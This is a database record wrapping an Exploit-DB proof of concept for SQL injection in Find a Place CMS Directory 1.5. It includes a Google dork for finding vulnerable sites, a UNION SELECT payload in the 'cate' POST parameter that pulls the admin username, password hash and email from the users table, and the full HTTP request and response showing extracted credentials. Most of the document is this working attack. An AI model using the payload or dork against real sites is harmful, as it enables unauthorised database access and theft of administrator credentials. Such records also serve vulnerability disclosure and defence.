{"id": "EDB-ID:46418", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection", "description": "", "published": "2019-02-19T00:00:00", "modified": "2019-02-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/46418", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2019-02-19T17:45:07", "viewCount": 27, "enchantments": {"dependencies": {"references": [], "modified": "2019-02-19T17:45:07", "rev": 2}, "score": {"value": 0.4, "vector": "NONE", "modified": "2019-02-19T17:45:07", "rev": 2}, "vulnersScore": 0.4}, "sourceHref": "https://www.exploit-db.com/download/46418", "sourceData": "# Exploit Title: Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection\r\n# Google Dork: inurl:\"assets/external/data.php\"\r\n# Date: 14 Feb 2019\r\n# Exploit Author: Deyaa Muhammad\r\n# Author EMail: contact [at] deyaa.me\r\n# Author Blog: http://deyaa.me\r\n# Vendor Homepage: https://themerig.com/\r\n# Software Link: https://codecanyon.net/item/locations-multipurpose-cms-directory-theme/21098597\r\n# Demo Website: https://themerig.com/find/\r\n# Version: 1.5\r\n# Tested on: WIN7_x68/Linux\r\n# CVE : N/A\r\n\r\n# Description:\r\n----------------------\r\nFind a Place CMS Directory 1.5 suffers from a SQL Injection vulnerability.\r\n\r\n# POC:\r\n----------------------\r\n1. Access the following path https://[PATH]/assets/external/data_2.php\r\n2. You can perform a \"Generic UNION query\" and extract admin credentials by sending a \"POST\" request using the payload below\r\ncate=2.9') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -\r\n\r\n# Request:\r\n----------------------\r\nPOST /find/assets/external/data_2.php HTTP/1.1\r\nHost: server\r\nConnection: close\r\nContent-Length: 251\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nOrigin: https://themerig.com\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nReferer: https://server/find/index.php\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\ncate=2.9') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -\r\n\r\n\r\n# Response:\r\n----------------------\r\nHTTP/1.1 200 OK\r\nX-Powered-By: PHP/5.6.40\r\nSet-Cookie: PHPSESSID=1sml2ou7o5e379b05l3q0iscq1; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 227\r\nVary: Accept-Encoding\r\nDate: Fri, 15 Feb 2019 03:09:26 GMT\r\nAccept-Ranges: bytes\r\nServer: LiteSpeed\r\nAlt-Svc: quic=\":443\"; ma=2592000; v=\"35,39,43\"\r\nConnection: close\r\n\r\n{\"data\":[{\"id\":null,\"category\":null,\"title\":null,\"address\":null,\"latitude\":null,\"longitude\":null,\"marker_color\":null,\"feaured\":null,\"marker_image\":[\"\"],\"featured\":\"admin::4db50f86732e926e59d306cff063d568::themerig@server\"}]}", "osvdbidlist": [], "immutableFields": []}

{}